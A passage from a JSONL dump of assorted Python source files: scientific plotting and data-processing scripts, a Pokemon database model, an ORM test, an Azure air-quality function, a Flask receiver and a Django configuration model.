/ 100.0)))\n\n # Save the median, bottom and upper percentile contours.\n folder_name = 'contour_coordinates/'\n file_name_median = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'median')\n write_contour(sorted_v[percentile50_index, :],\n sorted_hs[percentile50_index, :],\n folder_name + file_name_median,\n label_x=label_v,\n label_y=label_hs)\n file_name_bottom = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'bottom')\n write_contour(sorted_v[bottom_percentile_index, :],\n sorted_hs[bottom_percentile_index, :],\n folder_name + file_name_bottom,\n label_x=label_v,\n label_y=label_hs)\n file_name_upper = determine_file_name_e2(\n 'Asta', 'Hannesdottir', NR_OF_YEARS_TO_DRAW, 'upper')\n write_contour(sorted_v[upper_percentile_index, :],\n sorted_hs[upper_percentile_index, :],\n folder_name + file_name_upper,\n label_x=label_v,\n label_y=label_hs)\n\n # Read the contours from the csv files.\n (contour_v_median, contour_hs_median) = read_contour(folder_name + file_name_median)\n (contour_v_bottom, contour_hs_bottom) = read_contour(folder_name + file_name_bottom)\n (contour_v_upper, contour_hs_upper) = read_contour(folder_name + file_name_upper)\n\n # Plot the sample, the median contour and the confidence interval.\n fig = plt.figure(figsize=(5, 5), dpi=150)\n ax = fig.add_subplot(111)\n plotted_sample = PlottedSample(x=np.asarray(dataset_d_v),\n y=np.asarray(dataset_d_hs),\n ax=ax,\n label='dataset D')\n contour_labels = ['50th percentile contour', '2.5th percentile contour',\n '97.5th percentile contour']\n plot_confidence_interval(\n x_median=contour_v_median, y_median=contour_hs_median,\n x_bottom=contour_v_bottom, y_bottom=contour_hs_bottom,\n x_upper=contour_v_upper, y_upper=contour_hs_upper, ax=ax,\n x_label=label_v,\n y_label=label_hs, contour_labels=contour_labels,\n plotted_sample=plotted_sample)\n if NR_OF_YEARS_TO_DRAW == 1:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' year')\n else:\n plt.title('Samples cover ' + str(NR_OF_YEARS_TO_DRAW) + ' years')\n plt.show()\n plt.savefig('../results/figures/hannesdottir_asta_exercise2_'+ str(NR_OF_YEARS_TO_DRAW) +'yr_confidenceintervals.png', dpi=300)\n","sub_path":"participants-code/contribution-3/e2_baseline_asta.py","file_name":"e2_baseline_asta.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"573175541","text":"import pandas as pd\nimport numpy as np\nimport featuretools as ft\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom featuretools.primitives import Count, Mean\nimport os\n\ndef get_country_df(): \n\n def p2f(x):\n \"\"\"\n Convert urban percentage to float\n \"\"\"\n try:\n return float(x.strip('%'))/100\n except:\n return np.nan\n\n def age2int(x):\n \"\"\"\n Convert Age to integer\n \"\"\"\n try:\n return int(x)\n except:\n return np.nan\n\n def fert2float(x):\n \"\"\"\n Convert Fertility Rate to float\n \"\"\"\n try:\n return float(x)\n except:\n return np.nan\n\n\n countries_df = pd.read_csv(\"./data/population_by_country_2020.csv\", converters={'Urban Pop %':p2f,\n 'Fert. Rate':fert2float,\n 'Med. Age':age2int})\n countries_df.rename(columns={'Country (or dependency)': 'country',\n 'Population (2020)' : 'population',\n 'Density (P/Km²)' : 'density',\n 'Fert. Rate' : 'fertility',\n 'Med. Age' : \"age\",\n 'Urban Pop %' : 'urban_percentage'}, inplace=True)\n\n\n\n countries_df['country'] = countries_df['country'].replace('United States', 'US')\n countries_df = countries_df[[\"country\", \"population\", \"density\", \"fertility\", \"age\", \"urban_percentage\"]]\n return countries_df\n\ndef get_weather_df():\n df_temperature = pd.read_csv('data/temperature_dataframe.csv')\n df_temperature['country'] = df_temperature['country'].replace('USA', 'US')\n df_temperature['country'] = df_temperature['country'].replace('UK', 'United Kingdom')\n df_temperature = df_temperature[[\"country\", \"province\", \"date\", \"humidity\", \"sunHour\", \"tempC\", \"windspeedKmph\"]].reset_index()\n df_temperature.rename(columns={'province': 'state'}, inplace=True)\n df_temperature[\"date\"] = pd.to_datetime(df_temperature['date'])\n df_temperature['state'] = df_temperature['state'].fillna('')\n\n return df_temperature\n\ndef get_icu_df():\n icu_df = pd.read_csv(\"./data/icu_bed.csv\")\n icu_df['Country Name'] = icu_df['Country Name'].replace('United States', 'US')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Russian Federation', 'Russia')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Iran, Islamic Rep.', 'Iran')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Egypt, Arab Rep.', 'Egypt')\n icu_df['Country Name'] = icu_df['Country Name'].replace('Venezuela, RB', 'Venezuela')\n\n # We wish to have the most recent values, thus we need to go through every year and extract the most recent one, if it exists.\n icu_cleaned = pd.DataFrame()\n icu_cleaned[\"country\"] = icu_df[\"Country Name\"]\n icu_cleaned[\"icu\"] = np.nan\n\n for year in range(1960, 2020):\n year_df = icu_df[str(year)].dropna()\n icu_cleaned[\"icu\"].loc[year_df.index] = year_df.values\n return icu_cleaned\n\nimport matplotlib.pylab as plt\ndef show_feature_importance(X,forest):\n \"\"\"\n Creates a sorted list of the feature importance of a decision tree algorithm.\n Furthermore it plots it.\n params:\n forest: Decision Tree algorithm\n \"\"\"\n importances = forest.feature_importances_\n indices = np.argsort(importances)[::-1]\n\n # Print the feature ranking\n# print(\"Feature ranking:\")\n\n# for f in range(X.shape[1]):\n# print(\"{}, Feature: {}, Importance: {}\".format(f + 1, X.columns[indices[f]], importances[indices[f]]))\n\n # Plot the feature importances of the forest\n plt.figure(figsize=(10,5))\n plt.title(\"Feature importances\")\n plt.bar(range(X.shape[1]), importances[indices], color=\"r\", align=\"center\")\n plt.xticks(range(X.shape[1]), X.columns[indices], rotation='vertical')\n plt.xlim([-1, X.shape[1]])\n plt.show()","sub_path":"titanic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"449617074","text":"from . import *\n\nclass Pokemon(Base):\n __tablename__ = 'pokemons'\n\n name = db.Column(db.String(128), nullable =False, unique =True)\n attack = db.Column(db.Integer, nullable=False)\n capture_rate = db.Column(db.Integer, nullable=False)\n defense = db.Column(db.Integer, nullable=False)\n hp = db.Column(db.Integer, nullable=False)\n pokedex_number = db.Column(db.Integer, nullable=False)\n sp_attack = db.Column(db.Integer, nullable=False)\n sp_defense = db.Column(db.Integer, nullable=False)\n speed = db.Column(db.Integer, nullable=False)\n type1 = db.Column(db.String(128), nullable =False, unique =True)\n type2 = db.Column(db.String(128), nullable =False, unique =True)\n generation = db.Column(db.Integer, nullable=False)\n is_legendary = db.Column(db.Integer, nullable=False)\n #image = #figure something for image\n\n\n def __init__(self, **kwargs):\n\n self.name = kwargs.get('name', None)\n self.attack = kwargs.get('attack', None)\n self.capture_rate = kwargs.get('capture_rate', None)\n self.defense = kwargs.get('defense', None)\n self.hp = kwargs.get('hp', None)\n self.pokedex_number = kwargs.get('pokedex_number', None)\n self.sp_attack = kwargs.get('sp_attack', None)\n self.sp_defense = kwargs.get('sp_defense', None)\n self.sp_speed = kwargs.get('sp_speed', None)\n self.speed = kwargs.get('speed', None)\n self.type1 = kwargs.get('type1', None)\n self.type2 = kwargs.get('type2', None)\n self.generation = kwargs.get('generation', None)\n self.is_legendary = kwargs.get('is_legendary', None)\n self.image = kwargs.get('image', None)\n\n\n def __repr__(self):\n return str(self.__dict__)\n\n\n\n\nclass PokemonSchema(ModelSchema):\n class Meta:\n model = Pokemon\n","sub_path":"app/irsystem/models/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"635129310","text":"from nose.tools import assert_equal\nfrom collections import OrderedDict\nfrom sqlplain import orm, sql, core, db\n\n\nclass Stock(object):\n def __init__(self, code, market, quotes=()):\n self.code = code\n self.market = market\n self.quotes = OrderedDict(quotes) # {date: price}\n\n def some_financial_method(self):\n # do something with the quotes\n pass\n\n\ndef buildmodel():\n \"Build the schema and utility query methods if needed\"\n s = db.Schema([\n ['stock', ['code', 'market'], [], {}],\n ['stock_quote', ['code', 'market', 'date'], ['price'],\n {'code': 'stock.code', 'market': 'stock.market'}],\n ])\n\n # two convenience query methods\n s.stock.get_stock_quotes = s.stock.get_stock_quotes.order_by('date DESC')\n s.stock.del_stock_quotes = sql.Query(\n 'DELETE FROM stock_quote WHERE code=:code AND market=:market')\n\n return s\n\n\ndef object_db_mismatch(s):\n \"Defines how to store and retrieve business objects\"\n\n @orm.Manager.read.register(Stock)\n def readStock(manager, stock):\n \"Read all the quotes from the db\"\n row = manager.read(s.stock(stock.code, stock.market))\n if row is None:\n return\n for code, market, date, price in manager(row.get_stock_quotes):\n stock.quotes[date] = price\n return stock\n\n @orm.Manager.save.register(Stock)\n def saveStock(manager, stock):\n \"Save the stock and all of its quotes into the db\"\n code, market = stock.code, stock.market\n manager.save(s.stock(code, market))\n manager.savemany(s.stock_quote(code, market, date, price)\n for date, price in stock.quotes.items())\n\n @orm.Manager.delete.register(Stock)\n def deleteStock(manager, stock):\n \"Delete the stock and all of its quotes from the db\"\n row = s.stock(stock.code, stock.market)\n manager(row.del_stock_quotes)\n manager.delete(row)\n\ns = buildmodel()\nobject_db_mismatch(s)\n\n\ndef populate(manager):\n stock1 = Stock('PIPPO', 'ITALY', [\n ('2012-12-01', 2.333),\n ('2012-12-02', 2.350),\n ('2012-12-03', 2.150),\n ])\n stock2 = Stock('PLUTO', 'ITALY', [\n ('2012-12-01', 12.33),\n ('2012-12-02', 12.50),\n ('2012-12-03', 12.15),\n ])\n manager.save(stock1)\n manager.save(stock2)\n\n\ndef createstock(conn):\n conn.executescript('''\\\nCREATE TABLE stock(\ncode VARCHAR(32),\nmarket VARCHAR(32),\nPRIMARY KEY (code, market)\n);\n\nCREATE TABLE stock_quote(\ncode VARCHAR(32) REFERENCES stock(code) ON UPDATE CASCADE,\nmarket VARCHAR(32) REFERENCES stock(market) ON UPDATE CASCADE,\ndate DATE,\nprice FLOAT NOT NULL,\nPRIMARY KEY (code, market, date)\n);\n''')\n\n\ndef check_read(manager):\n expected_dates = ['2012-12-03', '2012-12-02', '2012-12-01']\n\n for row in manager(sql.select(s.stock)):\n stock = manager.read(Stock(*row))\n assert_equal(stock.quotes.keys(), expected_dates) # check the ordering\n assert_equal(len(stock.quotes), 3)\n\n\ndef check_delete(manager):\n stock = Stock('PIPPO', 'ITALY')\n manager.delete(stock)\n assert_equal(manager.read(stock), None)\n\n\ndef test():\n with core.ScratchDB('sqlite3:///stock.sqlite', createstock) as db:\n manager = orm.Manager(db.conn)\n populate(manager)\n yield check_read, manager\n yield check_delete, manager\n","sub_path":"doc/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"385912351","text":"##############################################################\n# #\n# Helper script that takes the output of CalcJSON.sh script #\n# sh CalcJSON.sh #\n# and splits it into fill-blocks #\n# #\n##############################################################\n\ndebug = False\ninput = \"LumiCalc_Moriond17.txt\"\nout = \"SplittedFills_Moriond17.txt\"\n\nprint(\"--------------------------------------\")\nprint(\" Splitting the JSON file in fills ...\" )\nprint(\"--------------------------------------\")\n\nwith open(input, \"r\") as Inp:\n print(\"Opening \" + input + \".\")\n run = []\n fill = []\n time = []\n nls = []\n ncms = []\n delivered = []\n recorded = []\n \n for line in Inp:\n if(line[0] != \"#\"):\n \n cleared_line = line.split(\",\")\n run_fill = cleared_line[0].split(\":\")\n run.append(run_fill[0])\n fill.append(run_fill[1])\n time.append(cleared_line[1])\n nls.append(cleared_line[2])\n ncms.append(cleared_line[3])\n delivered.append((cleared_line[4]))\n recorded.append(float(cleared_line[5]))\n\ncleared_fill = []\nfor i in fill:\n if i not in cleared_fill:\n cleared_fill.append(i)\n\nsum = 0\nrun_B = []\nrun_E = []\nfill_B = []\nfill_E = []\nLumiBlock_A = []\nn_runs = 0\ntotalLumi = 0\nj=0\n\nfor i in range(0, len(recorded)):\n sum += recorded[i]\n n_runs += 1\n if ( i == len(recorded)-1 or ((fill[i] == cleared_fill[j]) and fill[i+1] != cleared_fill[j])):\n LumiBlock_A.append(sum)\n run_B.append(run[i+1-n_runs])\n run_E.append(run[i])\n fill_B.append(fill[i+1-n_runs])\n fill_E.append(fill[i])\n n_runs = 0\n totalLumi += sum\n sum = 0\n if(j < len(cleared_fill) - 1):\n j+=1\n\nprint(min(LumiBlock_A))\nprint(max(LumiBlock_A))\nif(debug):\n for i in range(0, len(LumiBlock_A)):\n print(\"{0}:{1} - {2}:{3} block with LUMI: {4:2f}\".format(run_B[i],fill_B[i],run_E[i],fill_E[i],LumiBlock_A[i]))\n\noutput = open(out,\"w\")\nfor i in range(0, len(LumiBlock_A)):\n output.write(str(run_B[i]) + \" \" + str(fill_B[i]) + \" \" + str(run_E[i]) + \" \" + str(fill_E[i]) + \" \" + str(LumiBlock_A[i]) + \"\\n\")\n\nprint(\"Done!\\n\\n\" + str(totalLumi) + \" /fb splitted in \" + str(len(LumiBlock_A)) + \" blocks.\\nOutput written in \" + out + \".\")\n\n","sub_path":"JSON_calc/SplitPerFill.py","file_name":"SplitPerFill.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"277285356","text":"class jobOptionsRecData:\n\n def __init__( self, parametersList = None ):\n self.IncludeDict = {}\n self.IncludeDict['InputDataConversion'] = \"'$RAWDATACNVROOT/share/ReadRawDatajobOptions.txt'\"\n self.IncludeDict['TriggerMaker'] = \"'$TRIGMAKERALGROOT/share/jobOptions_TrigMakerAlg.txt'\"\n self.IncludeDict['EventLoop'] = \"'$OFFLINEEVENTLOOPMGRROOT/share/OfflineEventLoopMgr_Option.txt'\"\n self.IncludeDict['BackgroundMixing'] = None\n self.IncludeDict['CalibData'] = \"'$CALIBSVCROOT/share/job-CalibData.txt'\"\n self.IncludeDict['MagneticField'] = \"'$MAGNETICFIELDROOT/share/MagneticField.txt'\"\n self.IncludeDict['EventStartTime'] = \"'$ESTIMEALGROOT/share/job_EsTimeAlg.txt'\"\n self.IncludeDict['MdcRec'] = \"'$MDCXRECOROOT/share/jobOptions_MdcPatTsfRec.txt'\"\n self.IncludeDict['MdcKalmanRec'] = \"'$KALFITALGROOT/share/job_kalfit_numf_data.txt'\"\n self.IncludeDict['MdcDedxRec'] = \"'$MDCDEDXALGROOT/share/job_dedx_all.txt'\"\n self.IncludeDict['TrkExtRec'] = \"'$TRKEXTALGROOT/share/TrkExtAlgOption.txt'\"\n self.IncludeDict['TofRec'] = \"'$TOFRECROOT/share/jobOptions_TofRec.txt'\"\n self.IncludeDict['TofEnergyRec'] = \"'$TOFENERGYRECROOT/share/TofEnergyRecOptions_Data.txt'\"\n self.IncludeDict['EmcRec'] = \"'$EMCRECROOT/share/EmcRecOptions.txt'\"\n self.IncludeDict['EmcTimRec'] = \"'$EMCTIMERECROOT/share/EmcTimeRecOptions.txt'\"\n self.IncludeDict['MucRec'] = \"'$MUCRECALGROOT/share/jobOptions_MucRec.txt'\"\n self.IncludeDict['ROOTIO'] = \"'$ROOTIOROOT/share/jobOptions_Dst2Root_data.txt'\"\n self.IncludeDict['Calib'] = \"'$CALIBSVCROOT/share/calibConfig_rec_data.txt'\"\n self.IncludeDict['EventAssembly'] = \"'$EVENTASSEMBLYROOT/share/EventAssembly.txt'\"\n self.IncludeDict['PrimaryVertexFit'] = \"'$PRIMARYVERTEXALGROOT/share/jobOptions_kalman.txt'\"\n self.IncludeDict['VeeVertexFit'] = \"'$VEEVERTEXALGROOT/share/jobOptions_veeVertex.txt'\"\n self.IncludeDict['HltMaker'] = \"'$HLTMAKERALGROOT/share/jobOptions_HltMakerAlg.txt'\"\n self.IncludeDict['EventNavigator'] = None\n self.InList = ['InputDataConversion', 'TriggerMaker','EventLoop', 'BackgroundMixing', 'CalibData', 'MagneticField', 'EventStartTime', 'MdcRec', 'MdcKalmanRec', 'MdcDedxRec', 'TrkExtRec', 'TofRec', 'TofEnergyRec', 'EmcRec', 'EmcTimRec', 'MucRec', 'ROOTIO', 'Calib', 'EventAssembly', 'PrimaryVertexFit', 'VeeVertexFit', 'HltMaker', 'EventNavigator']\n\n\n self.ParametersDict = {}\n self.ParametersDict['input'] = []\n self.ParametersDict['output'] = []\n self.ParametersDict['OutputLevel'] = '5'\n self.ParametersDict['EventNumber'] = '50'\n self.PaList = ['input', 'output', 'OutputLevel', 'EventNumber']\n\n\n self.parametersList = parametersList\n\n\n #self.CosmicFlag = CosmicFlag\n #self.MFFlag = MFFlag\n\n def resolveParametersList( self ):\n if self.parametersList != None:\n for parameter in self.parametersList:\n name = parameter.getName()\n value = parameter.getValue()\n extra = parameter.getExtra()\n if name in self.InList:\n if value:\n self.IncludeDict[name] = \"'\" + value + \"'\"\n if extra:\n for ret in extra:\n self.IncludeDict[name] += '\\n'\n self.IncludeDict[name] += ret\n self.IncludeDict[name] += ';'\n if name in self.PaList:\n self.ParametersDict[name] = value\n return True\n\n def toTXT( self ):\n result = self.resolveParametersList()\n if result:\n ret = '//jobOptions_rec\\n'\n for k in self.InList:\n v = self.IncludeDict[k]\n if v:\n ret += '//%s\\n' % k\n ret += \"#include %s\\n\" % v\n for k in self.PaList:\n v = self.ParametersDict[k]\n if k == 'input' or k == 'output':\n ret += '\\n//I/O Assignment'\n if k == 'input':\n ret += '\\nEventCnvSvc.digiRootInputFile = {'\n for value in v:\n ret = ret + '\"' + value + '\" '\n ret += '};'\n elif k == 'output':\n ret += '\\nRootCnvSvc.digiRootOutputFile = '\n for value in v:\n ret = ret + '\"' + value + '\"'\n ret += ';'\n elif k == \"OutputLevel\":\n ret = ret + '\\n//' + k\n ret = ret + '\\nMessageSvc.OutputLevel = ' + v + ';'\n elif k == \"EventNumber\":\n ret = ret + '\\n//' + k\n ret = ret + '\\nApplicationMgr.EvtMax = ' + v + ';'\n return ret\n else:\n return False\n\n def toTXTFile( self, filename ):\n f = open( filename, 'w+')\n ret = self.toTXT()\n f.write( ret )\n f.close\n return filename\n","sub_path":"Core/Workflow/Utilities/jobOptions_rec_data.py","file_name":"jobOptions_rec_data.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"481202249","text":"import logging\n\nimport azure.functions as func\nimport os\nimport requests\nimport json\n\nCOULD_NOT_PARSE = \"Couldn't get the air pollution there\"\n\nQUALITY_INDEX = {1: \"Good\", 2: \"Fair\", 3: \"Moderate\", 4: \"Poor\", 5: \"Very Poor\"}\n\ndef getAQI(lat, lon):\n api_key = os.environ[\"API_key\"]\n url = f\"http://api.openweathermap.org/data/2.5/air_pollution?lat={lat}&lon={lon}&appid={api_key}\"\n resp = requests.get(url)\n if resp.status_code == 200:\n body = json.loads(resp.text)\n aqi = body['list'][0]['main']['aqi']\n return aqi\n return COULD_NOT_PARSE\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n\n req_body = None;\n try:\n req_body = req.get_json()\n except ValueError:\n pass\n \n lattitude = req.params.get('lattitude')\n if not lattitude and req_body:\n lattitude = req_body.get('lattitude')\n longitude = req.params.get('longitude')\n if not longitude and req_body:\n longitude = req_body.get('longitude')\n\n if lattitude and longitude:\n air_pollution = getAQI(lattitude, longitude)\n if air_pollution != COULD_NOT_PARSE:\n return func.HttpResponse(f\"The AQI at that area is {QUALITY_INDEX[air_pollution]}.\", status_code=200)\n else:\n return func.HttpResponse(air_pollution, status_code=200)\n else:\n return func.HttpResponse(\n \"This HTTP triggered function executed successfully. Pass lattitude and longitude in the query string or request body to get the AQI at that location.\\n\\nExample:\\n{\\n\\t\\\"lattitude\\\": \\\"47.60357\\\"\\n\\t\\\"longitude\\\": \\\"-122.32945\\\"\\n}\",\n status_code=200\n )\n","sub_path":"GetAQI/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"491321108","text":"# _*_ coding:utf-8 _*_\n\nimport json\nimport time\n\nfrom model.data_model import *\nfrom flask import Blueprint,request\nfrom dao.slove_data import slove_data\nimport logging\nrecv_data_route = Blueprint('recv_data', __name__)\n\n@recv_data_route.route('/dsky',methods=['GET','POST'])\ndef recv_data():\n try:\n start = time.time()\n para = request.values.get('data');\n data = json.loads(para)\n detail_info_list= []\n master_info = Master_Info(data[\"id\"],\n data[\"mmac\"],\n data[\"rate\"],\n data[\"wssid\"],\n data[\"wmac\"])\n \n for e in data[\"data\"]:\n detail_info = Detail_Info(e[\"mac\"],\n e[\"rssi\"],\n e[\"ts\"],\n e[\"tmc\"],\n e[\"tc\"],\n e[\"ds\"],\n e[\"rec\"])\n detail_info_list.append(detail_info)\n \n \n \n mslove_data =slove_data()\n mslove_data.save_data(master_info, detail_info_list)\n \n end = time.time()\n logging.info(u'end request totol time: %d',int(end-start))\n except: \n import sys\n ExecInfo = sys.exc_info()\n logging.error(ExecInfo[1])\n raise Exception(ExecInfo[1])\n return \"Done\"\n","sub_path":"source/action/recv_data_action.py","file_name":"recv_data_action.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"486267069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\n\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.template import Context, Template\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom utils import constants, common\nfrom utils.django_base import BaseModel\nfrom utils.mail import EbMail\n\nlogger = common.get_ap_logger()\n\n\n# Create your models here.\nclass Config(BaseModel):\n group = models.CharField(max_length=50, verbose_name=\"グループ\")\n name = models.CharField(max_length=50, primary_key=True, verbose_name=\"設定名\")\n value = models.CharField(max_length=2000, verbose_name=\"設定値\")\n comment = models.TextField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n\n class Meta:\n ordering = ['group', 'name']\n verbose_name = verbose_name_plural = \"システム設定\"\n db_table = 'mst_config'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def get_value_by_name(cls, group, name, default_value=None, comment=None):\n try:\n value = Config.objects.get(name=name).value\n return value\n except ObjectDoesNotExist:\n if default_value is not None:\n Config.objects.create(group=group, name=name, value=default_value, comment=comment)\n return default_value\n\n @classmethod\n def get_circle_radius(cls):\n \"\"\"地図時で円作成時の半径を取得する。\n\n 取得失敗の場合はデフォルトの2000メートルを返却する。\n\n :return:\n \"\"\"\n default = 2000\n try:\n circle = Config.objects.get(name=constants.CONFIG_CIRCLE_RADIUS).value\n try:\n return int(circle)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_CIRCLE_RADIUS,\n value=default)\n return default\n\n @classmethod\n def get_domain_name(cls):\n default = 'https://ap.mopa.jp'\n try:\n return Config.objects.get(name=constants.CONFIG_DOMAIN_NAME).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_DOMAIN_NAME,\n value=default)\n return default\n\n @classmethod\n def get_page_size(cls):\n \"\"\"\n\n :return:\n \"\"\"\n default = 25\n try:\n value = Config.objects.get(name=constants.CONFIG_PAGE_SIZE).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_PAGE_SIZE, value=default)\n return default\n\n @classmethod\n def get_decimal_type(cls):\n \"\"\"小数の処理区分を取得する。\n\n :return:\n \"\"\"\n default = '0'\n try:\n return Config.objects.get(name=constants.CONFIG_DECIMAL_TYPE).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_DECIMAL_TYPE,\n value=default)\n return default\n\n @classmethod\n def get_consumption_tax_rate(cls):\n \"\"\"消費税の税率を取得する。\n\n :return:\n \"\"\"\n default = 0.08\n try:\n value = Config.objects.get(name=constants.CONFIG_CONSUMPTION_TAX_RATE).value\n try:\n return float(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_CONSUMPTION_TAX_RATE,\n value=default)\n return default\n\n @classmethod\n def get_car_length_adjust(cls):\n \"\"\"車全長の調整値。\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_LENGTH_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_LENGTH_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_width_adjust(cls):\n \"\"\"車全幅の調整値。\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_WIDTH_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_WIDTH_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_height_adjust(cls):\n \"\"\"車全高の調整値。\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_HEIGHT_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_HEIGHT_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_weight_adjust(cls):\n \"\"\"車重量の調整値。\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_WEIGHT_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_WEIGHT_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_url_timeout(cls):\n \"\"\"URLのタイムアウト時間を取得する\n\n 設定値の単位は時間ですけど、秒の値を戻す。\n\n :return:\n \"\"\"\n default = 3600 * 24\n try:\n value = Config.objects.get(name=constants.CONFIG_URL_TIMEOUT).value\n try:\n return int(float(value) * 3600)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_URL_TIMEOUT, value=24)\n return default\n\n @classmethod\n def get_gcm_url(cls):\n default = 'https://fcm.googleapis.com/fcm/send'\n try:\n return Config.objects.get(name=constants.CONFIG_GCM_URL).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_GCM_URL, value=default)\n return default\n\n @classmethod\n def get_firebase_serverkey(cls):\n default = ''\n try:\n return Config.objects.get(name=constants.CONFIG_FIREBASE_SERVERKEY).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_FIREBASE_SERVERKEY,\n value=default)\n return default\n\n @classmethod\n def get_google_map_key(cls):\n default = ''\n try:\n return Config.objects.get(name=constants.CONFIG_GOOGLE_MAP_KEY).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_GOOGLE, name=constants.CONFIG_GOOGLE_MAP_KEY,\n value=default)\n return default\n\n @classmethod\n def get_yahoo_app_id(cls):\n default = ''\n return cls.get_value_by_name(constants.CONFIG_GROUP_YAHOO, name=constants.CONFIG_YAHOO_APP_KEY,\n default_value=default)\n\n @classmethod\n def get_furigana_service(cls):\n default = ''\n return cls.get_value_by_name(constants.CONFIG_GROUP_YAHOO, name=constants.CONFIG_FURIGANA_SERVICE_URL,\n default_value=default)\n\n @classmethod\n def get_parking_lot_key_alert_percent(cls):\n \"\"\"駐車場の残り鍵警告比率\n\n :return:\n \"\"\"\n default = 0.3\n try:\n value = cls.get_value_by_name(\n constants.CONFIG_GROUP_SYSTEM, constants.CONFIG_PARKING_LOT_KEY_ALERT_PERCENT, default_value=default\n )\n return float(value)\n except Exception as ex:\n logger.error(ex)\n return default\n\n @classmethod\n def get_simple_subscription_persist_time(cls):\n \"\"\"申込みフォーム入力完了後の仮押さえ時間\n\n :return:\n \"\"\"\n default = 24\n value = cls.get_value_by_name(constants.CONFIG_GROUP_SYSTEM,\n name=constants.CONFIG_SIMPLE_SUBSCRIPTION_PERSIST_TIME,\n default_value=default,\n comment='申込みフォーム入力完了後の仮押さえ時間')\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n\n\nclass Company(BaseModel):\n name = models.CharField(unique=True, max_length=30, verbose_name=\"会社名\")\n kana = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"フリカナ\")\n president = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"代表者名\")\n post_code = models.CharField(blank=True, null=True, max_length=8, verbose_name=\"郵便番号\")\n address1 = models.CharField(blank=True, null=True, max_length=200, verbose_name=\"住所1\")\n address2 = 